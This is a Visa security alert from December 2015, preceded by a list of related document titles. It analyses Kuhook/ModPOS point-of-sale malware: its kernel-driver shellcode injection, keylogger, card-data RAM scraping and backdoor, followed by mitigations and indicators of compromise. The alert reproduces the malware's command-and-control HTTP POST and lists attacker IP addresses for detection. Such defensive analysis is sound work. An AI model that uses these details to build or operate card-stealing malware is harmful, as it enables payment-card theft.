VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE. Summary. Distribution and Installation



Similar documents
Alert (TA14-212A) Backoff Point-of-Sale Malware

The Value of Physical Memory for Incident Response

V ISA SECURITY ALERT 13 November 2015

Operation Liberpy : Keyloggers and information theft in Latin America

Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities

Redline Users Guide. Version 1.12

05 June 2015 A MW TLP: GREEN

This report is a detailed analysis of the dropper and the payload of the HIMAN malware.

DRIVE-BY DOWNLOAD WHAT IS DRIVE-BY DOWNLOAD? A Typical Attack Scenario

G DATA SECURITYLABS CASE STUDY OPERATION TOOHASH HOW TARGETED ATTACKS WORK

Cyber - Security and Investigations. Ingrid Beierly August 18, 2008

Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com

PCI PA - DSS. Point XSA Implementation Guide. Atos Worldline Banksys XENTA SA. Version 1.00

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

Top Five Data Security Trends Impacting Franchise Operators. Payment System Risk September 29, 2009

Detecting Malware With Memory Forensics. Hal Pomeranz SANS Institute

PCI Compliance Considerations

GFI White Paper PCI-DSS compliance and GFI Software products

Data Security for the Hospitality

Global Partner Management Notice

Visa Data Security Bulletin (AP)

McAfee Labs Threat Advisory W32/Autorun.worm.aaeb-h

Redline User Guide. Release 1.14

Spyware. Summary. Overview of Spyware. Who Is Spying?

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

Chapter 4 Application, Data and Host Security

PCI PA - DSS. Point BKX Implementation Guide. Version Atos Xenta, Atos Xenteo and Atos Yomani using the Point BKX Payment Core

Protecting Your Organisation from Targeted Cyber Intrusion

Online Payments Threats

MITIGATING LARGE MERCHANT DATA BREACHES

PCI PA - DSS. Point ipos Implementation Guide. Version VeriFone Vx820 using the Point ipos Payment Core

Advanced Endpoint Protection Overview

UNMASKCONTENT: THE CASE STUDY

FastPOS: Quick and Easy Credit Card Theft

From Georgia, with Love Win32/Georbot. Is someone trying to spy on Georgians?

Cisco Advanced Malware Protection for Endpoints

For more information on SQL injection, please refer to the Visa Data Security Alert, SQL Injection Attacks, available at

COMP 112 Assignment 1: HTTP Servers

PCI Compliance for Cloud Applications

2014 Entry Form (Complete one for each entry.) Fill out the entry name exactly as you want it listed in the program.

RSA Security Anatomy of an Attack Lessons learned

Release Notes for Websense Security v7.2

Java Web Application Security

Advanced Malware Cleaning Techniques for the IT Professional

PGP Universal Satellite Version 2.7 for Windows Release Notes

5 Steps to Advanced Threat Protection

RSA Enterprise Compromise Assessment Tool (ECAT) Date: January 2014 Authors: Jon Oltsik, Senior Principal Analyst and Tony Palmer, Senior Lab Analyst

Malware Analysis Report

74% 96 Action Items. Compliance

Quick Heal Exchange Protection 4.0

McAfee Web Gateway Administration Intel Security Education Services Administration Course Training

Securing Secure Browsers

Keystroke Encryption Technology Explained

Owner of the content within this article is Written by Marc Grote

場 次 :C-3 公 司 名 稱 :RSA, The Security Division of EMC 主 題 : 如 何 應 用 網 路 封 包 分 析 對 付 資 安 威 脅 主 講 人 :Jerry.Huang@rsa.com Sr. Technology Consultant GCR

Thoughts on PCI DSS 3.0. September, 2014

Hide and seek - how targeted attacks hide behind clean applications Szappanos Gábor

What To Do If Compromised

What do a banking Trojan, Chrome and a government mail server have in common? Analysis of a piece of Brazilian malware

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

Endpoint protection for physical and virtual desktops

Novell Sentinel Log Manager 1.2 Release Notes. 1 What s New. 1.1 Enhancements to Licenses. Novell. February 2011

8/17/2010. Over 90% of all compromised merchants are PCI level 4 (small) merchants or merchants with less than 1 million transactions per year

Recommended Practice Case Study: Cross-Site Scripting. February 2007

PE Explorer. Heaventools. Malware Code Analysis Made Easy

Ovation Security Center Data Sheet

WEB ATTACKS AND COUNTERMEASURES

RFG Secure FTP. Web Interface

Stop the Maelstrom: Using Endpoint Sensor Data in a SIEM to Isolate Threats

How To Secure An Rsa Authentication Agent

Storm Worm & Botnet Analysis

Advanced & Persistent Threat Analysis - I

Crowbar: New generation web application brute force attack tool

CHAD TILBURY.

F-Secure Internet Security 2014 Data Transfer Declaration

Deploying the BIG-IP System with Oracle E-Business Suite 11i

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

The Key to Secure Online Financial Transactions

egambit Forensic egambit, your defensive cyber-weapon system. You have the players. We have the game.

SPAMfighter Mail Gateway

TLP: GREEN FBI. FBI Liaison Alert System # A MW

LEVERAGING PROACTIVE DEFENSE TO DEFEAT MODERN ADVERSARIES. Jared Greenhill RSA Incident Response. September 17 th, 2015

Trend Micro OfficeScan Best Practice Guide for Malware

Web DLP Quick Start. To get started with your Web DLP policy

The 12 Essentials of PCI Compliance How it Differs from HIPPA Compliance Understand & Implement Effective PCI Data Security Standard Compliance

Windows Client/Server Local Area Network (LAN) System Security Lab 2 Time allocation 3 hours

WEB SECURITY. Oriana Kondakciu Software Engineering 4C03 Project

RSA Incident Response: An APT Case Study

ZeroAccess. James Wyke. SophosLabs UK

Five Steps to Improve Internal Network Security. Chattanooga ISSA

Recurring Credit Card Billing

Threat Events: Software Attacks (cont.)

Presented by: Mike Morris and Jim Rumph

KEY STEPS FOLLOWING A DATA BREACH

White Paper THE FOUR ATTACK VECTORS TO PREVENT OR DETECT RETAILER BREACHES. By James Christiansen, VP, Information Risk Management

Transcription:

VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE Distribution: Merchants, Acquirers Who should read this: Information security, incident response, cyber intelligence staff Summary Kuhook (from the ModPOS malware family) is a variation of malware targeting Point of Sale (POS) systems designed to run on Microsoft Windows. It utilizes keylogger and memory scraping/parsing functionality. The malware is suspected to be privately owned and used, meaning that it is not currently distributed through online criminal forums and therefore is not known to be widely available. To date, Visa has observed the malware on two previous occasions but we are not aware of any current victims of Kuhook at this time. However, we believe with high confidence the malware will be modified and used to target additional merchants and other entities processing payment card data. The malware is a set of kernel mode device drivers written for the Window XP platform and packed with a piece of software that compresses the malware file, thus making all the original code and data unreadable. Once unpacked, the malware injects shellcode into processes and executes using system calls. Injected shellcode functions primarily as a persistence mechanism, provides a backdoor capability, acts as a keylogger, and steals payment card data. It is some of the most sophisticated and difficult to detect payment card stealing malware Visa has ever seen. Distribution and Installation Since the Kuhook malware is private at the moment and thought to be in use by a limited number of criminal actors (or a single criminal actor), delivery and infection methods are not well known. It installs itself as an unsigned device driver on Windows XP. The packed driver is loaded into kernel space and then unpacked and decrypted. The unpacked driver then makes a copy of itself in kernel space. It launches a new system thread using the newly unpacked and decrypted driver. The driver does not appear in the list of loaded kernel modules and thus is hidden on the system. Once running, the driver injects shellcode into the following user processes: Crss.exe Winlogon.exe Explorer.exe Iexplore.exe Credit.exe Services.exe 1

Malware capability The malware functions primarily as a backdoor (upload/download capability), a keylogger, and payment card stealing RAM-scraper. Kuhook features two distinct data-stealing mechanisms: a keylogger and a memory scanner designed to target POS systems, specifically POS controllers, payment application software and ultimately, payment data including Primary Account Number (PAN), expiration date and Cardholder Verification Value (CVV). Backdoor / Downloader The backdoor component s main function is to download and update or introduce additional malware. A driver module is used to install the backdoor by injecting shellcode into running processes for iexplore.exe, firefox.exe or svchost.exe. The shellcode communicates over HTTP to a hardcoded IP address (see Technical Indicators of Compromise (IOCs) below. It issues an HTTP POST (figure 1) request to the hard-coded IP, then downloads an encoded file which is used by the kernel driver to decode and execute additional shellcode embedded in an HTML comment. POST /robots.txt HTTP/1.0 Accept: */* Content-Length: 32 Content-Type: application/octet-stream User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: 109.72.149.42 Pragma: no-cache [POST DATA] Figure 1 Keylogger The keylogger driver installs itself by injecting shellcode into explorer.exe. It enumerates all input devices on the infected system followed by registering a new input device (itself). At that point, the malware operates very much like we would expect: intercepts and records keystrokes on the system where it s installed and operating. Keystrokes are logged on the local system and stored in c:\windows\installer\{guid}_[random_characters].bin. Each instance of the malware output file is encrypted with a unique AES-256 bit encryption key. At the time this variant was observed, the encryption key was unprotected in the system s memory, allowing it to be obtained by examining the explorer.exe application s memory space. 2

RAM Scraper The memory scanner searches through running processes on the system for the payment application. The.sys file created that perform the scraping is polymorphic in nature and creates a random string of characters for a file name in each iteration. Given that the payment executable name was hard-coded in most recently observed malware sample, Visa believes this malware is customized for specific merchants and payment applications by its author. Once the payment application process is identified by the malware, it scans that process s memory for track 2 data. When track 2 data is found, the malware extracts it and enters it into a log on the local system. Extracted track 2 data is stored in the c:\windows\installer\{guid}_[random_characters].bin file. Each instance of the malware output file is encrypted with a unique AES-256 bit encryption key (unprotected in memory as with the keylogger module above). Mitigation Visa requires participants in the payment system to comply with all PCI-DSS requirements and recommends the following security controls to reduce the risk of exposure to Kuhook: Install application whitelisting on Point of Sale systems. In addition to anti-virus and antimalware security, application whitelisting programs are designed to only allow known and trusted executables to be installed and operate. This technology makes it much more difficult to introduce malware onto POS systems. Closely monitor activity on Point of Sale systems. This malware is very difficult to detect, however it does leave signs that should cause alarm. Be aware of those signs and investigate all suspicious activity on the POS. Creates new files in c:\windows\installer directory Establishes communication to external IP addresses over HTTP May impact the functioning of the POS application (application crashes) Control the Windows Administrator account. Data-stealing malware (like Kuhook) requires Administrator-level permission in order to perform memory-scanning and key logging functions. Make it more difficult for malware to gain Administrative privileges. Assign a strong password for all accounts on the POS system. Create a unique local Administrator password for each and every POS system. Do not allow users to be local Administrators on a POS system. Change password frequently (at least every 90 days). Ensure the POS system functions as a single purpose machine. To reduce the risk of malicious software infection, disallow all applications and services (i.e. Internet browsers, email clients) that are not directly required as part of the POS s core functionality in processing payments. 3

Keep operating system patch levels up to date. For Windows, this means ensuring Windows Update is functioning and automatically applying monthly security patches. Harden operating systems according to industry guidelines. Restrict permissions on Windows file sharing or disable file sharing altogether. Visa recommends disabling file sharing on POS systems. Microsoft has published instructions on how to disable simple file sharing and set permissions on shared folders. Indicators of Compromise (IOCs) IOC Type Notes 91.207.61.208 Destination IP address Command and control server 109.72.149.42 Destination IP address Command and control server 130.0.237.22 Destination IP address Command and control server 5.187.1.198 Destination IP address Command and control server ABA833D11679DFEBC95060BD3C557853 File MD5 hash Malicious driver file 215BDF185C3B35503923FCF8872C75FC File MD5 hash Malicious driver file F9C4E2D38DF8A87F545B6F5BA1F8691B File MD5 hash Malicious driver file F21403B6CF7516B37EFFC17F410CED6F File MD5 hash Malicious driver file 6FBD31E7B5A31F5F75BD0D858D3327B5 File MD5 hash Malicious driver file 68F40544ACD5568BD782434CA0F5AEE5 File MD5 hash Malicious backdoor file 540DF6480B393BFA39D2E7CEC608EA12 File MD5 hash Password harvesting file %SystemRoot%\system32\drivers Install path Malware install path C:\windows\Installer\[random characters].bin Path to log files Keystroke logger, track 2 data logs C:\windows\TEMP\[random characters].bin Path to log files Keystroke logger, track 2 data logs C:\windows\TEMP\[random characters].temp Path to log files Encrypted status logs HTTP POST /robots.txt Network indicator Network traffic to the /robots.txt POST request shows patterns in the request headers and server response that are consistent across all samples. The request is to a hard-coded IP address over HTTP The user-agent string is consistent throughout the samples previously listed The server returns a 405 "Method Not Allowed" response Following the HTML closing tag is a series of spaces (hexadecimal value, "20") followed by &#60!-- which serves as a marker for where the encrypted data stream begins. 4

Additional Resources This malware targets Windows-based POS systems, including Windows XP. It should be noted that Microsoft s support ended in April 2014 for Windows XP and will end in January 2016 for Windows XP Embedded operating systems. POS applications built on these legacy have increased risk due to their lack of ongoing support and security patches. Additional indicators and analysis found in isight Partners ModPOS malware intelligence report, dated October 2015 To report a data breach, contact Visa Fraud Control: Asia Pacific Region, Central Europe/Middle East/Africa Region: VIFraudControl@visa.com Canada Region, Latin America Region, United States: USFraudControl@visa.com For more information, please contact Visa Risk Management: cisp@visa.com 5